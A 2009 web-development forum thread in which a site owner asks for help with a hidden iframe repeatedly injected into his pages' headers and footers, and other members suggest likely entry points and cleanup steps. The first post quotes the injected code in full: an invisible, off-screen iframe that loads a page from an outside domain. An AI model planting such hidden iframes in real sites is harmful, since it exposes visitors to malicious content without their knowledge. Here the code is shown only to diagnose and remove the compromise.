SitePoint Sponsor |
|
User Tag List
Results 1 to 15 of 15
Thread: Help: Hacker Attack
-
May 5, 2009, 01:40 #1
- Join Date
- Oct 2005
- Location
- Manchester, UK
- Posts
- 296
- Mentioned
- 0 Post(s)
- Tagged
- 0 Thread(s)
Help: Hacker Attack
Hi There
There is a mysterious piece of code being added to my websites (header, footer, both).
The code looks like
HTML Code:<iframe width="480" height="60" style="border: 0px none ; position: relative; top: 0px; left: -500px; opacity: 0;" src="http://profitooltip.biz/blog/feed.html"/>
Please help ASAP
Kind Regards,
-
May 5, 2009, 01:44 #2
- Join Date
- Apr 2008
- Location
- North-East, UK.
- Posts
- 6,111
- Mentioned
- 3 Post(s)
- Tagged
- 0 Thread(s)
Have you tried disabling JS in your browser to see if the element is still created? Do you display user input on your site. if so, does any of it contain JS or links to JS?
There's not much anyone can do without seeing your code... or at least a link to the site in question.@AnthonySterling: I'm a PHP developer, a consultant for oopnorth.com and the organiser of @phpne, a PHP User Group covering the North-East of England.
-
May 5, 2009, 01:45 #3
- Join Date
- Aug 2000
- Location
- Philadephia, PA
- Posts
- 20,578
- Mentioned
- 1 Post(s)
- Tagged
- 0 Thread(s)
Do you run any scripts on this site which you did not author yourself? Are they not the very latest versions of those scripts? If you answered yes to those questions, that's a likely entry point.
The other is through the whole server being compromised through someone else's account or vulnerable software.
Contact the web host.Try Improvely, your online marketing dashboard.
→ Conversion tracking, click fraud detection, A/B testing and more
-
May 5, 2009, 01:55 #4
- Join Date
- Oct 2005
- Location
- Manchester, UK
- Posts
- 296
- Mentioned
- 0 Post(s)
- Tagged
- 0 Thread(s)
Hi i have disabled my javascript and the sites are working perfectly.
Nothing is being added
-
May 5, 2009, 01:59 #5
- Join Date
- Oct 2005
- Location
- Manchester, UK
- Posts
- 296
- Mentioned
- 0 Post(s)
- Tagged
- 0 Thread(s)
@Silver
Send you my url in PM.
-
May 5, 2009, 02:06 #6
- Join Date
- Oct 2005
- Location
- Manchester, UK
- Posts
- 296
- Mentioned
- 0 Post(s)
- Tagged
- 0 Thread(s)
Actually the sites are on two separate servers. One in UK and other server in Germany.
Also, I have no 3rd party software on my pages except Google Analytics and I have just updated my code but still the problem persists.
-
May 5, 2009, 03:12 #7
- Join Date
- Oct 2005
- Location
- Manchester, UK
- Posts
- 296
- Mentioned
- 0 Post(s)
- Tagged
- 0 Thread(s)
Ok its something called an IFrame attack.
I cant understand the entry point.
Can you please point at how this could have happened.
Malicious code adds itself to page's footer/header.
But surely i havent given out my FTP details to anyone.
I also add mysql_real_escape_string to all my database insertions.
-
May 5, 2009, 03:26 #8
- Join Date
- Apr 2008
- Location
- North-East, UK.
- Posts
- 6,111
- Mentioned
- 3 Post(s)
- Tagged
- 0 Thread(s)
@AnthonySterling: I'm a PHP developer, a consultant for oopnorth.com and the organiser of @phpne, a PHP User Group covering the North-East of England.
-
May 5, 2009, 03:41 #9
- Join Date
- Oct 2005
- Location
- Manchester, UK
- Posts
- 296
- Mentioned
- 0 Post(s)
- Tagged
- 0 Thread(s)
Hi Silver
I think i sent it to you in something else.
Well it seems like iframe attack and may have stemmed from xss.
I am checking everything on my own.
-
May 5, 2009, 03:41 #10
- Join Date
- Oct 2005
- Location
- Manchester, UK
- Posts
- 296
- Mentioned
- 0 Post(s)
- Tagged
- 0 Thread(s)
If you have anything about how iframe attacks generate and how I can prevent them from my site then please share.
Thanks
-
May 5, 2009, 05:34 #11
- Join Date
- Feb 2005
- Location
- was rainy Oregon now sunny Florida
- Posts
- 1,104
- Mentioned
- 2 Post(s)
- Tagged
- 0 Thread(s)
google for
another-type-of-iframe-hack-php-exploit
Thats it.What I lack in acuracy I make up for in misteaks
-
May 6, 2009, 06:42 #12
- Join Date
- Oct 2005
- Location
- Manchester, UK
- Posts
- 296
- Mentioned
- 0 Post(s)
- Tagged
- 0 Thread(s)
Ummm searching. Anyone with personal experience here ?
-
May 6, 2009, 08:01 #13
- Join Date
- Jul 2008
- Posts
- 5,757
- Mentioned
- 0 Post(s)
- Tagged
- 0 Thread(s)
Basically you allowed the hacker to write to your filesystem. Most likely, you have a script somewhere which does something with the filesystem carelessly.
Sitepoint has a web security forum. You should read through some existing threads to get ideas on where and how to look for the hole.
Be aware, the hole could very well be another website hosted on the same shared webserver.
-
May 8, 2009, 06:23 #14
- Join Date
- Oct 2005
- Location
- Manchester, UK
- Posts
- 296
- Mentioned
- 0 Post(s)
- Tagged
- 0 Thread(s)
I got a Plesk server with every site having its own ftp. Sites dont mingle. But its still on the site.
I asked for apache error logs but nothing there.
I dont know what to do.Last edited by khuramyz; May 8, 2009 at 06:23. Reason: added extra two lines
-
May 8, 2009, 11:10 #15
- Join Date
- Jul 2008
- Posts
- 32
- Mentioned
- 0 Post(s)
- Tagged
- 0 Thread(s)
There could be a variety of reasons.
Remove that line of code, change your FTP password, see if it still persists.
Change the CHMOD of the file in question and see if it still persists.
Search for Javascript that might have document.createElement("iframe") or document.write("iframe code here") and find out how that code got there.
etc...
Bookmarks